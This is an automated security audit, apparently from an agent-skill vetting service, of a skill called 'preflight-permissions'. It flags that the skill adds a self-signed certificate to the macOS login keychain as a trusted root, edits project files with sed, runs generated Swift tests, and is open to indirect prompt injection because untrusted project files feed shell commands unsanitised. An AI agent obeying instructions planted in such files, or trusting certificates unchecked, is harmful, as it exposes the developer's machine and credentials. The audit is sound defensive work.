preflight-permissions
Warn
Audited by Gen Agent Trust Hub on Mar 28, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill performs sensitive security operations using the
securitycommand-line utility. It creates a self-signed certificate, imports it into~/Library/Keychains/login.keychain-db, and marks it as a trusted root usingsecurity add-trusted-cert -d -r trustRoot. This modifies the security posture of the host machine. - [COMMAND_EXECUTION]: The skill uses
sedto programmatically modify project files such as.pbxprojorproject.yml. It also executesxcodebuildto build applications and run tests. Notably, it generates a Swift test file (PermissionSmokeTests) at runtime and executes it, which constitutes dynamic code generation and execution. - [DATA_EXFILTRATION]: The skill targets the sensitive path
~/Library/Keychains/login.keychain-db. While used for legitimate development purposes in this context, accessing or modifying the keychain database is a high-risk operation involving sensitive user credentials. - [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it parses untrusted local files to determine command arguments.
- Ingestion points: The skill reads
project.yml,*.xcodeproj, entitlements files, and performs recursivegrepoperations on the project source directory to find strings like bundle IDs and target names. - Boundary markers: Absent. There are no delimiters or instructions to the agent to disregard malicious instructions embedded in the project files being analyzed.
- Capability inventory: The skill can modify the macOS keychain, trust certificates, modify local files via
sed, and execute code viaxcodebuildandopen. - Sanitization: Absent. Extracted values like
{AppName}and{Project}are used directly in shell scripts and Swift code without validation or escaping.
Audit Metadata